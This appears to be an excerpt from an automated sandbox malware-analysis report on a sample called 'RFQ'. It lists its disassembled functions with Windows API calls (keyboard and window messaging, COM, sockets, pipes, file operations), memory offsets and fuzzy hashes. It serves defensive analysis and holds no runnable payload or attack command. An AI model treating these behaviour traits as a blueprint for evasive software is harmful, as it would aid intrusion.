                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 9943c16f49050c43c311c0d28d3a4256842fc57f4099062b33667a8d7f4d6763
                                                                            • Instruction ID: 59af383a9a0fcaca500eb08b389420f7e2225cb922c4d08e73bb5e264e66be47
                                                                            • Opcode Fuzzy Hash: 9943c16f49050c43c311c0d28d3a4256842fc57f4099062b33667a8d7f4d6763
                                                                            • Instruction Fuzzy Hash: BC912571D40219AFCF10CFE9CC84AEEBBBAFF49320F14815AE515B7251D278A941CBA5
                                                                            Function 0070386E Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 00703892
                                                                            • CharUpperBuffW.USER32(?,?), ref: 007039A1
                                                                            • _wcslen.LIBCMT ref: 007039B1
                                                                            • VariantClear.OLEAUT32(?), ref: 00703B46
                                                                              • Part of subcall function 006F0BFD: VariantInit.OLEAUT32(00000000), ref: 006F0C3D
                                                                              • Part of subcall function 006F0BFD: VariantCopy.OLEAUT32(?,?), ref: 006F0C46
                                                                              • Part of subcall function 006F0BFD: VariantClear.OLEAUT32(?), ref: 006F0C52
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4137639002-1221869570
                                                                            • Opcode ID: 57376587e4601bbca6c01140211f1a0d37b3b9d0fd0f4220c203a8e78e4d450b
                                                                            • Instruction ID: 4fc0c50f61a154dd9d6ddbf5af799b7693b4c518cc885343001cf4c19dd7f80a
                                                                            • Opcode Fuzzy Hash: 57376587e4601bbca6c01140211f1a0d37b3b9d0fd0f4220c203a8e78e4d450b
                                                                            • Instruction Fuzzy Hash: 44915874608341DFC700EF68C48596AB7E9BF89314F148A2DF88A8B391DB75EE05CB52
                                                                            Function 00704AD4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006DFEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF14
                                                                              • Part of subcall function 006DFEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF2F
                                                                              • Part of subcall function 006DFEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF3D
                                                                              • Part of subcall function 006DFEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,006DFE2A,80070057), ref: 006DFF4D
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00704B78
                                                                            • _wcslen.LIBCMT ref: 00704C80
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00704CF6
                                                                            • CoTaskMemFree.OLE32(?), ref: 00704D01
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 614568839-2785691316
                                                                            • Opcode ID: 5b1c9a0879e17810d1a93cea850771078771793e679f4198800dac8e3761a2cb
                                                                            • Instruction ID: de5291532e69d26d4435f6c54fdfaec21b6f8320cd1808109bab05ffcf1c9190
                                                                            • Opcode Fuzzy Hash: 5b1c9a0879e17810d1a93cea850771078771793e679f4198800dac8e3761a2cb
                                                                            • Instruction Fuzzy Hash: D69119B1D01219EFDF10DFA4D891AEEB7B9BF08310F108269E915A7291EB749E44CF64
                                                                            Function 00712030 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 007120B6
                                                                            • GetMenuItemCount.USER32(00000000), ref: 007120E8
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00712110
                                                                            • _wcslen.LIBCMT ref: 00712146
                                                                            • GetMenuItemID.USER32(?,?), ref: 00712180
                                                                            • GetSubMenu.USER32(?,?), ref: 0071218E
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00712216
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 4196846111-0
                                                                            • Opcode ID: ed374e27d8286311abefd49b392d2f68c3c6f598ed91625d6e45f19162819221
                                                                            • Instruction ID: c5eedfce6bd14340ddbf7b7ba84341ef720e4f6df44b68fd80c07264c4978e80
                                                                            • Opcode Fuzzy Hash: ed374e27d8286311abefd49b392d2f68c3c6f598ed91625d6e45f19162819221
                                                                            • Instruction Fuzzy Hash: 27718475A00205AFCB40EF68C845AEEB7F5EF49310F158459E915EB392D739ED82CB90
                                                                            Function 006EADD8 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 006EAE17
                                                                            • GetKeyboardState.USER32(?), ref: 006EAE2C
                                                                            • SetKeyboardState.USER32(?), ref: 006EAE8D
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 006EAEBB
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 006EAEDA
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 006EAF1B
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006EAF3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: a1a478286591f5fa41b490d1c080dabedd2bb393e0416fa4e09637fb65e44d4a
                                                                            • Instruction ID: 43e8952da4945bf4d7c9f25fecf4d5f249d3ef8d67248cf14c9e478a6c95c8fd
                                                                            • Opcode Fuzzy Hash: a1a478286591f5fa41b490d1c080dabedd2bb393e0416fa4e09637fb65e44d4a
                                                                            • Instruction Fuzzy Hash: 1251EFB06057D13DFB3643BA8C45BFABEAB5B06304F088589F0D5459D2D798BC84E752
                                                                            Function 006EABF8 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 006EAC37
                                                                            • GetKeyboardState.USER32(?), ref: 006EAC4C
                                                                            • SetKeyboardState.USER32(?), ref: 006EACAD
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006EACD9
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006EACF6
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006EAD35
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006EAD56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 9927f635ea3961094473d9d63070f8ec6ec093594250591808690812ad52ede5
                                                                            • Instruction ID: 4fa09a4bfbec00b397df6f586e8fcc252eb2a9bbab1fd64e539ffe738a59e262
                                                                            • Opcode Fuzzy Hash: 9927f635ea3961094473d9d63070f8ec6ec093594250591808690812ad52ede5
                                                                            • Instruction Fuzzy Hash: 4151F4B09467D53EFB3283B58C55BF67E9B6F01700F08898CE0D5469D2C694BC84D762
                                                                            Function 006A2CB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2CDB
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 006A2CE3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2D71
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 006A2D9C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 006A2DF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 71d17ec820d2b638cfaefe77c3c6dc1d1ee7b375718e10124b4dee9c879f5ea5
                                                                            • Instruction ID: 3433dc5f4bc3a75a751114bfa230860ed11b0204d9994bb9f717ac5f68eb39b1
                                                                            • Opcode Fuzzy Hash: 71d17ec820d2b638cfaefe77c3c6dc1d1ee7b375718e10124b4dee9c879f5ea5
                                                                            • Instruction Fuzzy Hash: A7419234A4021AABCF10FF6CC854A9EBBA6AF46324F148159E8155B392D735EE01CF90
                                                                            Function 00700FDF Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00702F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00702FA1
                                                                              • Part of subcall function 00702F75: _wcslen.LIBCMT ref: 00702FC2
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00701039
                                                                            • WSAGetLastError.WSOCK32 ref: 00701048
                                                                            • WSAGetLastError.WSOCK32 ref: 007010F0
                                                                            • closesocket.WSOCK32(00000000), ref: 00701120
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 2675159561-0
                                                                            • Opcode ID: f6e47cb0079ba117e14a26443561420e8d02b242066898aa91e7a807389ca357
                                                                            • Instruction ID: 4eed64a43f864841430837220c1259aa76b9d40877075f1c649e1417068da989
                                                                            • Opcode Fuzzy Hash: f6e47cb0079ba117e14a26443561420e8d02b242066898aa91e7a807389ca357
                                                                            • Instruction Fuzzy Hash: 1D410131600104EFDB109F68C884BAAB7EAFF45324F54C219F845AB2D2C779AD81CBE5
                                                                            Function 006ECE1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006ECE40,?), ref: 006EDD1B
                                                                              • Part of subcall function 006EDCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006ECE40,?), ref: 006EDD34
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 006ECE63
                                                                            • MoveFileW.KERNEL32(?,?), ref: 006ECE9D
                                                                            • _wcslen.LIBCMT ref: 006ECF23
                                                                            • _wcslen.LIBCMT ref: 006ECF39
                                                                            • SHFileOperationW.SHELL32(?), ref: 006ECF7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 3164238972-1173974218
                                                                            • Opcode ID: 1edeaeab99a9bfc678072d6c942bf25fb75296285953e9a733a0d67c9eb9f859
                                                                            • Instruction ID: 84b4a81f6adffcd56a415003f7a6846418b7e61c02a546ae71c77df72d14e0df
                                                                            • Opcode Fuzzy Hash: 1edeaeab99a9bfc678072d6c942bf25fb75296285953e9a733a0d67c9eb9f859
                                                                            • Instruction Fuzzy Hash: 1241C6728023585EDF52EBA5D981EDD77BAAF08340F0000EAE504EB141EB74AB85CF54
                                                                            Function 00712D30 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00712D4F
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712D82
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712DB7
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00712DE9
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00712E13
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00712E24
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00712E3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: 3f49da764c5c8f402f7f4f2b35e4cc8763e5edb2ff31f47592bd8aa394127439
                                                                            • Instruction ID: b1627b16deb5252ba0ac12f626dc3e1a8c44457cf2eec06d526a4107b57dae61
                                                                            • Opcode Fuzzy Hash: 3f49da764c5c8f402f7f4f2b35e4cc8763e5edb2ff31f47592bd8aa394127439
                                                                            • Instruction Fuzzy Hash: CB311430744254AFEB218F4CEC88FE437A1FB4A711F1581A4F5548B2F2CB79ACA19B48
                                                                            Function 006E767C Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E76BF
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E76E5
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 006E76E8
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7706
                                                                            • SysFreeString.OLEAUT32(?), ref: 006E770F
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006E7734
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7742
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: d6e0e0e308c23eb79b331e41186ee338de394120b42d39b6549b5ddc3ccd624e
                                                                            • Instruction ID: 8bdd004ada9ec3fc886a5eabf67ef1a5124cdb41f68bc0b1fb68a38c283a0662
                                                                            • Opcode Fuzzy Hash: d6e0e0e308c23eb79b331e41186ee338de394120b42d39b6549b5ddc3ccd624e
                                                                            • Instruction Fuzzy Hash: 4021A176609269AFDF01DFADCC88CFA77AEEB08364704C025B904DB290E674DC428764
                                                                            Function 006E7753 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E7798
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006E77BE
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 006E77C1
                                                                            • SysAllocString.OLEAUT32 ref: 006E77E2
                                                                            • SysFreeString.OLEAUT32 ref: 006E77EB
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006E7805
                                                                            • SysAllocString.OLEAUT32(?), ref: 006E7813
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 17d24c661f7f5bfe8fcbee2c1d0cdd1b6121dab3bab079e159bc47efbdce1b43
                                                                            • Instruction ID: cfadae4a8e234f463439a9002cb37e3fcccf3182d95da08c1104dd2b644a159a
                                                                            • Opcode Fuzzy Hash: 17d24c661f7f5bfe8fcbee2c1d0cdd1b6121dab3bab079e159bc47efbdce1b43
                                                                            • Instruction Fuzzy Hash: D221AF75609254AF9F10ABEDCC88DEA7BEDEB09360700C525F915CB2A0DA74DC45CB68
                                                                            Function 006F03F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006F0410
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F044C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: dd0058fdaf5c837869954391d1d94e5d626123a1f3f9b8407da3d20dfec1d00e
                                                                            • Instruction ID: a6074130ee6286855ce4ccd1e723674a554e770f800a0f54f11c1fd9bc8d73d6
                                                                            • Opcode Fuzzy Hash: dd0058fdaf5c837869954391d1d94e5d626123a1f3f9b8407da3d20dfec1d00e
                                                                            • Instruction Fuzzy Hash: A8213DB4600309EBEB208F69DC09AE977E5BF55724F208A19FFA1D72D2D7749940CB60
                                                                            Function 006F04C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006F04E4
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006F051F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: bd67a676236b572b0721d8464439e284f7379eb717a9ebe12626a3fd6c603025
                                                                            • Instruction ID: 073e1d8b49719cac558246334c7ddffb35b32d488abab77261a19e45592e802b
                                                                            • Opcode Fuzzy Hash: bd67a676236b572b0721d8464439e284f7379eb717a9ebe12626a3fd6c603025
                                                                            • Instruction Fuzzy Hash: 2E21A3756443199BEB208F688D04AE977E9BF55720F204A19FEA1D32D1D7B0D940CF24
                                                                            Function 006BD77F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006BD743: _free.LIBCMT ref: 006BD76C
                                                                            • _free.LIBCMT ref: 006BD7CD
